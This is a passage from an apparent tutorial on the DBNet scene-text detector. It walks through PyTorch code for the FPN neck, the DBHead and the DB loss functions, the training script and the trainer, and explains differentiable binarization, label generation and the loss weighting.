        self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

        self.conv = nn.Sequential(
            nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
            nn.BatchNorm2d(self.conv_out),
            nn.ReLU(inplace=inplace)
        )  # conv + batch norm + ReLU applied to the fused feature map
        self.out_channels = self.conv_out  # channel count of the output feature map

    def forward(self, x):
        c2, c3, c4, c5 = x  # a tuple of four feature maps from different backbone stages
        # Top-down pathway
        p5 = self.reduce_conv_c5(c5)
        p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
        p4 = self.smooth_p4(p4)
        p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
        p3 = self.smooth_p3(p3)
        p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
        p2 = self.smooth_p2(p2)

        x = self._upsample_cat(p2, p3, p4, p5)  # concatenate all levels along the channel dimension
        x = self.conv(x)  # final processing of the fused feature map
        return x

    def _upsample_add(self, x, y):
        # Upsample x to y's spatial size, then add them.
        return F.interpolate(x, size=y.size()[2:]) + y

    def _upsample_cat(self, p2, p3, p4, p5):
        # Upsample p2..p5 to the same size, then concatenate along the channel dimension.
        h, w = p2.size()[2:]
        p3 = F.interpolate(p3, size=(h, w))
        p4 = F.interpolate(p4, size=(h, w))
        p5 = F.interpolate(p5, size=(h, w))
        return torch.cat([p2, p3, p4, p5], dim=1)
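As a quick shape check, here is a minimal sketch (my own, assuming the repo's modules are importable and ResNet-50-style stage channels [256, 512, 1024, 2048]; the sizes correspond to a 640x640 input at strides 4/8/16/32):

import torch

# Hypothetical stage channels for a ResNet-50-style backbone.
fpn = FPN(in_channels=[256, 512, 1024, 2048], inner_channels=256)

# Dummy c2..c5 feature maps for a 640x640 input (strides 4, 8, 16, 32).
c2 = torch.randn(1, 256, 160, 160)
c3 = torch.randn(1, 512, 80, 80)
c4 = torch.randn(1, 1024, 40, 40)
c5 = torch.randn(1, 2048, 20, 20)

out = fpn((c2, c3, c4, c5))
print(out.shape)  # expected: torch.Size([1, 256, 160, 160]), i.e. 1/4 of the input resolution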
• ConvHead
  • ConvHead is a very basic and common module: a 1x1 convolution followed by a Sigmoid applied to the input feature map. It mainly produces the final output map, in particular when the feature map has to be turned into a probability map.
import torch
from torch import nn


class ConvHead(nn.Module):
    def __init__(self, in_channels, out_channels, **kwargs):
        super().__init__()
        self.conv = nn.Sequential(
            # A 1x1 convolution: a linear transform along the channel dimension that
            # leaves the spatial dimensions (width and height) unchanged.
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
            # Sigmoid squashes the conv output into [0, 1]; typically used when the task
            # needs probabilities, e.g. binary classification or normalized feature maps.
            nn.Sigmoid()
        )

    def forward(self, x):
        return self.conv(x)
    • DBHead
import torch
from torch import nn


class DBHead(nn.Module):
    def __init__(self, in_channels, out_channels, k=50):
        super().__init__()
        self.k = k  # amplifying factor used by the step function in forward
        self.binarize = nn.Sequential(  # sequential module that produces the shrink (probability) map
            nn.Conv2d(in_channels, in_channels // 4, 3, padding=1),  # 3x3 conv, in_channels -> in_channels // 4
            nn.BatchNorm2d(in_channels // 4),  # batch normalization
            nn.ReLU(inplace=True),  # non-linear activation
            nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2),  # 2x upsampling (doubles spatial dims)
            nn.BatchNorm2d(in_channels // 4),
            nn.ReLU(inplace=True),
            nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
            nn.Sigmoid())  # outputs values in [0, 1], suitable for a probability map
        self.binarize.apply(self.weights_init)

        self.thresh = self._init_thresh(in_channels)  # module that produces the threshold map
        self.thresh.apply(self.weights_init)

    def forward(self, x):
        shrink_maps = self.binarize(x)   # output of the binarize branch
        threshold_maps = self.thresh(x)  # output of the thresh branch
        if self.training:  # in training mode
            binary_maps = self.step_function(shrink_maps, threshold_maps)  # approximate binary map via the step function
            y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1)  # concatenate all three maps
        else:
            y = torch.cat((shrink_maps, threshold_maps), dim=1)
        return y

    def weights_init(self, m):
        # He initialization (kaiming_normal_) for conv weights; fixed values for batch norm layers.
        classname = m.__class__.__name__
        if classname.find('Conv') != -1:
            nn.init.kaiming_normal_(m.weight.data)
        elif classname.find('BatchNorm') != -1:
            m.weight.data.fill_(1.)
            m.bias.data.fill_(1e-4)

    def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
        # Build the sequential module that generates the threshold map:
        # conv, batch norm, ReLU, upsampling and a final Sigmoid.
        in_channels = inner_channels
        if serial:
            in_channels += 1
        self.thresh = nn.Sequential(
            nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
            nn.Sigmoid())
        return self.thresh

    def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
        # Upsampling module: nearest-neighbour interpolation plus a conv, or a transposed conv.
        if smooth:  # smooth upsampling
            inter_out_channels = out_channels
            if out_channels == 1:
                inter_out_channels = in_channels
            module_list = [
                nn.Upsample(scale_factor=2, mode='nearest'),  # double the spatial dims via nearest-neighbour interpolation
                nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)]  # refine the upsampled feature map
            if out_channels == 1:
                # If out_channels is 1, append an extra conv to adjust the channel count.
                module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
            return nn.Sequential(*module_list)
        else:
            # Otherwise upsample directly with a transposed convolution.
            return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

    def step_function(self, x, y):
        # The differentiable step function: a sigmoid-like curve of the difference between
        # x (shrink map) and y (threshold map), producing values between 0 and 1.
        return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
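A minimal shape check for the head (my own sketch; the 160x160 input assumes a neck output at 1/4 of a 640x640 image):

import torch

head = DBHead(in_channels=256, out_channels=2, k=50)
x = torch.randn(1, 256, 160, 160)  # neck output at 1/4 resolution

head.train()
print(head(x).shape)  # torch.Size([1, 3, 640, 640]): shrink, threshold and approximate binary maps

head.eval()
print(head(x).shape)  # torch.Size([1, 2, 640, 640]): the binary map is only computed during training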
1. The input image is fed into a feature-pyramid backbone.

2. The pyramid features are upsampled to the same scale and cascaded to produce feature $F$.

3. Feature $F$ is used to predict both the probability map $P$ and the threshold map $T$.

4. DB computes the approximate binary map $\hat B$ from $P$ and $T$.

• During training, supervision is applied to $P$, $T$ and $\hat B$, where $P$ and $\hat B$ share the same supervision.

• During inference, bounding boxes can be obtained easily from $\hat B$ or $P$ via the box formulation module.

Binarization

Standard binarization

A single hard cut-off:

$$B_{i,j}=\begin{cases}1 & \mathrm{if}\ P_{i,j}\ge t,\\ 0 & \mathrm{otherwise.}\end{cases}$$

Given the probability map $P\in R^{H\times W}$ produced by the segmentation network, where $H$ and $W$ denote its height and width, it must be converted into a binary map $B\in R^{H\times W}$, in which pixels with value $1$ are considered valid text regions. $t$ is a predefined threshold and $(i,j)$ denotes a coordinate point in the map.

Differentiable binarization

The equation above is not differentiable, so it cannot be optimized together with the segmentation network during training. An approximate step function is therefore used for binarization:

$$\hat B_{i,j}=\frac{1}{1+e^{-k(P_{i,j}-T_{i,j})}}$$

where $\hat B$ is the approximate binary map, $T$ is the adaptive threshold map learned by the network, and $k$ is the amplifying factor, empirically set to 50.

def step_function(self, x, y):
    # This step_function is exactly the differentiable binarization formula.
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))

[figure: DB curve compared with standard binarization (SB)]

The larger the $k$ in DB, the closer it gets to standard binarization.
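A quick numerical check of this (a minimal sketch of mine, not from the paper's code): evaluating the DB curve for a few values of $k$ shows how it sharpens toward a hard step at $x=P_{i,j}-T_{i,j}=0$.

import numpy as np

def db(x, k):
    # Differentiable binarization curve applied to x = P - T.
    return 1.0 / (1.0 + np.exp(-k * x))

for k in (1, 10, 50):
    print(k, [round(v, 3) for v in db(np.array([-0.2, -0.05, 0.0, 0.05, 0.2]), k)])
# k=1  -> values stay near 0.5: a soft, nearly linear response
# k=50 -> values snap to ~0 or ~1: close to a hard threshold at x = 0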
The performance gain from DB can be explained through the gradients in back-propagation. Take the binary cross-entropy loss as an example, and define $f(x)=\frac{1}{1+e^{-kx}}$ as our DB function, where $x=P_{i,j}-T_{i,j}$. The losses for positive labels, $l_{+}$, and for negative labels, $l_{-}$, are then:

$$l_{+}=-\log\frac{1}{1+e^{-kx}}$$

$$l_{-}=-\log\left(1-\frac{1}{1+e^{-kx}}\right)$$

The differentials of the losses follow from the chain rule (a one-line check is given after the list below):

$$\begin{aligned}&\frac{\partial l_+}{\partial x}=-kf(x)e^{-kx}\\&\frac{\partial l_-}{\partial x}=kf(x)\end{aligned}$$

From the differentials of $l_{+}$ and $l_{-}$ we can see that:

1. the gradient is amplified by the factor $k$;
2. the amplification is most significant in wrongly predicted regions ($x<0$ for $l_{+}$; $x>0$ for $l_{-}$), which benefits optimization and helps produce more distinctive predictions. Moreover, since $x=P_{i,j}-T_{i,j}$, the gradient of $P$ is affected and rescaled by $T$ between the foreground and the background.
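Both differentials can be verified in one line from the chain rule, using $f'(x)=kf(x)\left(1-f(x)\right)$ and the identity $1-f(x)=f(x)e^{-kx}$:

$$\frac{\partial l_+}{\partial x}=-\frac{f'(x)}{f(x)}=-k\left(1-f(x)\right)=-kf(x)e^{-kx},\qquad\frac{\partial l_-}{\partial x}=\frac{f'(x)}{1-f(x)}=kf(x)$$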

Adaptive threshold

The threshold map is predicted adaptively by the network rather than fixed by hand.

Deformable convolution

Deformable convolution provides the model with a flexible receptive field, which is especially beneficial for text instances with extreme aspect ratios. Modulated deformable convolutions are applied in all the 3×3 convolutional layers of the conv3, conv4 and conv5 stages of the ResNet-18 or ResNet-50 backbone.

Label generation

[figure]

Label generation. The annotation of a text polygon is shown as red lines; the shrunk and dilated polygons are shown as blue and green lines respectively.

The label generation for the probability map is inspired by PSENet. Given a text image, each polygon of its text regions is described by a set of segments:

$$G=\{S_k\}_{k=1}^{n}$$

$n$ is the number of vertices, which may differ across datasets: e.g. 4 for the ICDAR 2015 dataset (Karatzas et al.) and 16 for the CTW1500 dataset.

The positive area is generated by shrinking the polygon $G$ to $G_s$ with the Vatti clipping algorithm. The shrink offset $D$ is computed from the perimeter $L$ and area $A$ of the original polygon:

$$D=\frac{A(1-r^2)}{L}$$

where $r$ is the shrink ratio, empirically set to 0.4.
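The shrinking is typically done with the Vatti-clipping implementation in pyclipper. A minimal sketch, assuming pyclipper and shapely are installed; shrink_polygon is an illustrative helper of mine, not the repo's exact function:

import numpy as np
import pyclipper
from shapely.geometry import Polygon

def shrink_polygon(poly, r=0.4):
    # poly: list of (x, y) vertices of a text polygon G.
    p = Polygon(poly)
    A, L = p.area, p.length   # area and perimeter of the original polygon
    D = A * (1 - r ** 2) / L  # shrink offset from the formula above
    pco = pyclipper.PyclipperOffset()
    pco.AddPath(poly, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
    shrunk = pco.Execute(-D)  # a negative offset shrinks the polygon
    return [np.array(s) for s in shrunk]

quad = [(0, 0), (100, 0), (100, 20), (0, 20)]  # a toy 100x20 text quad
print(shrink_polygon(quad))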

With a similar procedure we can generate labels for the threshold map. First, the text polygon $G$ is dilated with the same offset $D$ to $G_d$. We regard the gap between $G_s$ and $G_d$ as the border of the text region, where the label of the threshold map is generated by computing the distance to the closest segment in $G$.

This is implemented in the data_loader:

• starting from the manually annotated gt boxes (series of coordinate points), apply dilate and shrink operations;
• compute distances inside the gt boxes to obtain the probability_map and the threshold_map.

Optimization

The loss function $L$ is a weighted sum of the probability-map loss $L_s$, the binary-map loss $L_b$ and the threshold-map loss $L_t$:

$$L=L_s+\alpha\times L_b+\beta\times L_t$$

$\alpha$ and $\beta$ are set to 1.0 and 10 respectively.

Binary cross-entropy (BCE) loss is applied to both $L_s$ and $L_b$ (with hard negative sampling over the set $S_l$):

$$L_s=L_b=-\sum_{i\in S_l}\left(y_i\log x_i+(1-y_i)\log(1-x_i)\right)$$

import torch
from torch import nn


class BalanceCrossEntropyLoss(nn.Module):
    # A balanced version of cross-entropy loss for class imbalance: positive and
    # negative samples are weighted differently so training copes better with
    # imbalanced classes.
    '''
    Balanced cross entropy loss.
    Shape:
        - Input: :math:`(N, 1, H, W)`
        - GT: :math:`(N, 1, H, W)`, same shape as the input
        - Mask: :math:`(N, H, W)`, same spatial shape as the input
        - Output: scalar.

    Examples::

        >>> m = nn.Sigmoid()
        >>> loss = nn.BCELoss()
        >>> input = torch.randn(3, requires_grad=True)
        >>> target = torch.empty(3).random_(2)
        >>> output = loss(m(input), target)
        >>> output.backward()
    '''

    def __init__(self, negative_ratio=3.0, eps=1e-6):
        # negative_ratio: ratio of negatives to positives, default 3.0
        #                 (keep at most 3 negatives per positive sample).
        # eps: small constant (1e-6) to avoid division by zero.
        super(BalanceCrossEntropyLoss, self).__init__()
        self.negative_ratio = negative_ratio
        self.eps = eps

    def forward(self,
                pred: torch.Tensor,   # network prediction, shape (N, 1, H, W)
                gt: torch.Tensor,     # target, same shape as pred
                mask: torch.Tensor,   # mask of shape (N, H, W) indicating positive regions
                return_origin=False):
        '''
        Args:
            pred: shape :math:`(N, 1, H, W)`, the prediction of network
            gt: shape :math:`(N, 1, H, W)`, the target
            mask: shape :math:`(N, H, W)`, the mask indicates positive regions
        '''
        # Count positives and negatives, capping the negatives by negative_ratio.
        positive = (gt * mask).byte()
        negative = ((1 - gt) * mask).byte()
        positive_count = int(positive.float().sum())
        negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
        # Per-pixel binary cross-entropy loss.
        loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
        positive_loss = loss * positive.float()
        negative_loss = loss * negative.float()
        # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
        # Keep only the hardest negative_count negatives (online hard example mining).
        negative_loss, _ = negative_loss.view(-1).topk(negative_count)

        # Weighted total loss.
        balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

        if return_origin:
            return balance_loss, loss
        return balance_loss

$L_t$ is computed as the sum of $L_1$ distances between the prediction and the label inside the dilated text polygon $G_d$ (with index set $R_d$):

$$L_t=\sum_{i\in R_d}\left|y_i^*-x_i^*\right|$$

import torch
from torch import nn


class MaskL1Loss(nn.Module):
    # An L1-loss variant with a mask: the loss is only computed inside the region of interest.
    def __init__(self, eps=1e-6):
        super(MaskL1Loss, self).__init__()
        self.eps = eps

    def forward(self, pred: torch.Tensor, gt, mask):
        # Absolute difference between prediction and target, averaged over the masked region.
        loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
        return loss

In the inference stage we can generate text bounding boxes from either the probability map or the approximate binary map; both produce almost identical results. The shrunk regions recovered from the map are then dilated back with offset $D'$:

$$D'=\frac{A'\times r'}{L'}$$

where $A'$ is the area of the shrunk polygon, $L'$ is its perimeter, and $r'$ is empirically set to 1.5.
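Box expansion at inference mirrors the shrinking used in label generation. A minimal pyclipper sketch under the same assumptions as above (unclip is an illustrative name of mine):

import numpy as np
import pyclipper
from shapely.geometry import Polygon

def unclip(shrunk_poly, r_prime=1.5):
    # shrunk_poly: vertices of a polygon recovered from the binary/probability map.
    p = Polygon(shrunk_poly)
    D = p.area * r_prime / p.length  # expansion offset D' = A' * r' / L'
    pco = pyclipper.PyclipperOffset()
    pco.AddPath(shrunk_poly, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
    expanded = pco.Execute(D)        # a positive offset dilates the polygon
    return [np.array(e) for e in expanded]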

    DB_loss.py

from torch import nn

from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


class DBLoss(nn.Module):
    def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
        """
        Implement DB Loss.
        :param alpha: coefficient of the binary_map loss
        :param beta: coefficient of the threshold_map loss
        :param ohem_ratio: ratio used for OHEM
        :param reduction: 'mean' or 'sum', average or sum the loss over the batch
        """
        super().__init__()
        assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
        # alpha and beta weight the different loss terms.
        self.alpha = alpha
        self.beta = beta
        self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
        self.dice_loss = DiceLoss(eps=eps)
        self.l1_loss = MaskL1Loss(eps=eps)
        self.ohem_ratio = ohem_ratio  # ratio for OHEM (online hard example mining)
        self.reduction = reduction    # how the loss is reduced over the batch (mean or sum)

    def forward(self, pred, batch):
        shrink_maps = pred[:, 0, :, :]
        threshold_maps = pred[:, 1, :, :]
        binary_maps = pred[:, 2, :, :]

        # Balanced cross-entropy (OHEM) loss on the shrink maps.
        loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask'])
        # Masked L1 loss on the threshold maps.
        loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask'])
        metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps)
        # If pred has more than two channels, also compute the Dice loss on the binary maps.
        if pred.size()[1] > 2:
            loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
            metrics['loss_binary_maps'] = loss_binary_maps
            # Total loss: weighted sum of all loss terms.
            loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps
            metrics['loss'] = loss_all
        else:
            metrics['loss'] = loss_shrink_maps
        # Return a dict with each loss term and the total loss.
        return metrics
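A quick smoke test of the loss wiring (my own sketch with random maps, assuming the repo's DiceLoss import works; the shapes follow DBHead's training-mode output):

import torch

criterion = DBLoss(alpha=1.0, beta=10)

pred = torch.rand(2, 3, 640, 640)  # shrink, threshold and binary maps, as produced in training mode
batch = {
    'shrink_map': torch.randint(0, 2, (2, 640, 640)).float(),
    'shrink_mask': torch.ones(2, 640, 640),
    'threshold_map': torch.rand(2, 640, 640),
    'threshold_mask': torch.ones(2, 640, 640),
}
metrics = criterion(pred, batch)
print({k: float(v) for k, v in metrics.items()})  # loss_shrink_maps, loss_threshold_maps, loss_binary_maps, loss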

    Experiments

from __future__ import print_function

import argparse
import os

import anyconfig


def init_args():
    parser = argparse.ArgumentParser(description='DBNet.pytorch')
    parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
    parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

    args = parser.parse_args()
    return args


def main(config):
    # Import the required modules: model building, losses, data loaders,
    # trainer, post-processing and evaluation metrics.
    import torch
    from models import build_model, build_loss
    from data_loader import get_dataloader
    from trainer import Trainer
    from post_processing import get_post_processing
    from utils import get_metric
    # If more than one GPU is available, initialize the distributed training environment.
    if torch.cuda.device_count() > 1:
        torch.cuda.set_device(args.local_rank)
        torch.distributed.init_process_group(backend="nccl", init_method="env://",
                                             world_size=torch.cuda.device_count(), rank=args.local_rank)
        config['distributed'] = True
    else:
        config['distributed'] = False
    config['local_rank'] = args.local_rank

    # Build the train and validation data loaders from the config file.
    train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
    assert train_loader is not None
    if 'validate' in config['dataset']:
        validate_loader = get_dataloader(config['dataset']['validate'], False)
    else:
        validate_loader = None

    # Build the loss function and move it to the GPU.
    criterion = build_loss(config['loss']).cuda()

    # Set the number of input channels (3 for color images, 1 for grayscale).
    config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
    model = build_model(config['arch'])

    # Build the post-processing function and the evaluation metric.
    post_p = get_post_processing(config['post_processing'])
    metric = get_metric(config['metric'])

    # Create the Trainer and start training.
    trainer = Trainer(config=config,
                      model=model,
                      criterion=criterion,
                      train_loader=train_loader,
                      post_process=post_p,
                      metric_cls=metric,
                      validate_loader=validate_loader)
    trainer.train()


if __name__ == '__main__':
    # Handle module paths: make sure the current and parent directories are on the Python path.
    import sys
    import pathlib
    __dir__ = pathlib.Path(os.path.abspath(__file__))
    sys.path.append(str(__dir__))
    sys.path.append(str(__dir__.parent.parent))
    # project = 'DBNet.pytorch'  # project root directory
    # sys.path.append(os.getcwd().split(project)[0] + project)

    # Read the config file with anyconfig and resolve the base config.
    from utils import parse_config

    args = init_args()
    assert os.path.exists(args.config_file)
    config = anyconfig.load(open(args.config_file, 'rb'))
    if 'base' in config:
        config = parse_config(config)
    # Call main to start training.
    main(config)
import time

import torch
import torchvision.utils as vutils
from tqdm import tqdm

from base import BaseTrainer
from utils import WarmupPolyLR, runningScore, cal_text_score


class Trainer(BaseTrainer):
    # __init__ takes the config, the model, the loss function (criterion), the train and
    # validation data loaders, the metric class (metric_cls) and an optional
    # post-processing function (post_process).
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
        super(Trainer, self).__init__(config, model, criterion)
        # Read show_images_iter from the config and set up the data loaders. If a validation
        # loader exists, a post-processing function and a metric class must be provided.
        self.show_images_iter = self.config['trainer']['show_images_iter']
        self.train_loader = train_loader
        if validate_loader is not None:
            assert post_process is not None and metric_cls is not None
        self.validate_loader = validate_loader
        self.post_process = post_process
        self.metric_cls = metric_cls
        self.train_loader_len = len(train_loader)
        # LR scheduler: WarmupPolyLR adjusts the learning rate with a warmup phase
        # followed by polynomial decay.
        if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
            warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
            if self.start_epoch > 1:
                self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
            self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
                                          warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
        # Log the sample counts of the train and validation datasets and loaders.
        if self.validate_loader is not None:
            self.logger_info(
                'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
                    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
        else:
            self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # _train_epoch trains the model for one epoch.
    def _train_epoch(self, epoch):
        self.model.train()  # switch the model to training mode
        # Record the start times of the epoch and of the current batch window.
        epoch_start = time.time()
        batch_start = time.time()
        train_loss = 0.
        running_metric_text = runningScore(2)
        # Initialize the accumulated loss and running metric, and read the current learning rate.
        lr = self.optimizer.param_groups[0]['lr']

        # Iterate over the batches of the training loader.
        for i, batch in enumerate(self.train_loader):
            if i >= self.train_loader_len:
                break
            self.global_step += 1
            lr = self.optimizer.param_groups[0]['lr']

            # Move the batch tensors to the GPU.
            for key, value in batch.items():
                if value is not None:
                    if isinstance(value, torch.Tensor):
                        batch[key] = value.to(self.device)
            cur_batch_size = batch['img'].size()[0]

            # Forward pass: get the predictions from the model.
            preds = self.model(batch['img'])
            # Compute the losses, then back-propagate and step the optimizer.
            loss_dict = self.criterion(preds, batch)
            # backward
            self.optimizer.zero_grad()
            loss_dict['loss'].backward()
            self.optimizer.step()
            # If WarmupPolyLR is used, step the LR scheduler.
            if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
                self.scheduler.step()
            # acc iou
            # Compute the shrink-map score and record the loss and accuracy.
            score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
                                              thred=self.config['post_processing']['args']['thresh'])

            # Collect the losses into a log string and accumulate the total training loss.
            loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
            for idx, (key, value) in enumerate(loss_dict.items()):
                loss_dict[key] = value.item()
                if key == 'loss':
                    continue
                loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
                if idx < len(loss_dict) - 1:
                    loss_str += ', '

            train_loss += loss_dict['loss']
            acc = score_shrink_map['Mean Acc']
            iou_shrink_map = score_shrink_map['Mean IoU']

            # Every log_iter steps: compute samples/sec and log accuracy, IoU, losses
            # and the learning rate, so the training process can be monitored.
            if self.global_step % self.log_iter == 0:
                batch_time = time.time() - batch_start
                self.logger_info(
                    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
                        epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
                        iou_shrink_map, loss_str, lr, batch_time))
                batch_start = time.time()

            # If TensorBoard is enabled, write the training losses and metrics for visualization.
            if self.tensorboard_enable and self.config['local_rank'] == 0:
                # write tensorboard
                for key, value in loss_dict.items():
                    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
                self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
                # Every show_images_iter steps: add the input images, the ground-truth maps
                # and the model predictions to TensorBoard, arranged as grids via vutils.make_grid.
                if self.global_step % self.show_images_iter == 0:
                    # show images on tensorboard
                    self.inverse_normalize(batch['img'])
                    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
                    # shrink_labels and threshold_labels
                    shrink_labels = batch['shrink_map']
                    threshold_labels = batch['threshold_map']
                    shrink_labels[shrink_labels <= 0.5] = 0
                    shrink_labels[shrink_labels > 0.5] = 1
                    show_label = torch.cat([shrink_labels, threshold_labels])
                    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
                    # model output
                    show_pred = []
                    for kk in range(preds.shape[1]):
                        show_pred.append(preds[:, kk, :, :])
                    show_pred = torch.cat(show_pred)
                    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
        # Return the average training loss, the learning rate, the elapsed time and the epoch number.
        return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
                'epoch': epoch}

    def _eval(self, epoch):
        # Switch to eval mode; this disables dropout and freezes batch-norm statistics.
        self.model.eval()
        # torch.cuda.empty_cache()  # speed up evaluating after training finished
        # raw_metrics stores the per-batch metrics; total_frame counts processed frames;
        # total_time accumulates the processing time.
        raw_metrics = []
        total_frame = 0.0
        total_time = 0.0
        for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
            # Disable gradient computation to save memory and speed up evaluation.
            with torch.no_grad():
                # Move the batch tensors to the GPU.
                for key, value in batch.items():
                    if value is not None:
                        if isinstance(value, torch.Tensor):
                            batch[key] = value.to(self.device)
                # Record the start time and run the forward pass.
                start = time.time()
                preds = self.model(batch['img'])
                # Post-process the predictions into boxes and scores.
                boxes, scores = self.post_process(batch, preds, is_output_polygon=self.metric_cls.is_output_polygon)
                # Update the statistics.
                total_frame += batch['img'].size()[0]
                total_time += time.time() - start
                # Compute and store the per-batch evaluation metrics.
                raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
                raw_metrics.append(raw_metric)
        # Aggregate the metrics over all batches.
        metrics = self.metric_cls.gather_measure(raw_metrics)
        # Log the frames per second (FPS).
        self.logger_info('FPS:{}'.format(total_frame / total_time))
        # Return recall, precision and f-measure.
        return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
        # Runs at the end of every training epoch:
        # log the epoch summary,
        self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
            self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
            self.epoch_result['lr']))
        # then save model checkpoints.
        net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
        net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

        # Only the main process saves checkpoints.
        if self.config['local_rank'] == 0:
            # Save the latest checkpoint.
            self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
            save_best = False
            if self.validate_loader is not None and self.metric_cls is not None:  # use f1 as the best-model criterion
                # Evaluate the model (when a validation set and a metric class exist).
                recall, precision, hmean = self._eval(self.epoch_result['epoch'])

                # Write the evaluation metrics to TensorBoard (if enabled).
                if self.tensorboard_enable:
                    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
                    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
                    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
                self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

                # Decide whether to save the best model based on the F1 score.
                if hmean >= self.metrics['hmean']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['hmean'] = hmean
                    self.metrics['precision'] = precision
                    self.metrics['recall'] = recall
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            else:
                # Without a validation set, fall back to the training loss.
                if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            # Log the best metrics so far, and copy the checkpoint if it is the new best.
            best_str = 'current best, '
            for k, v in self.metrics.items():
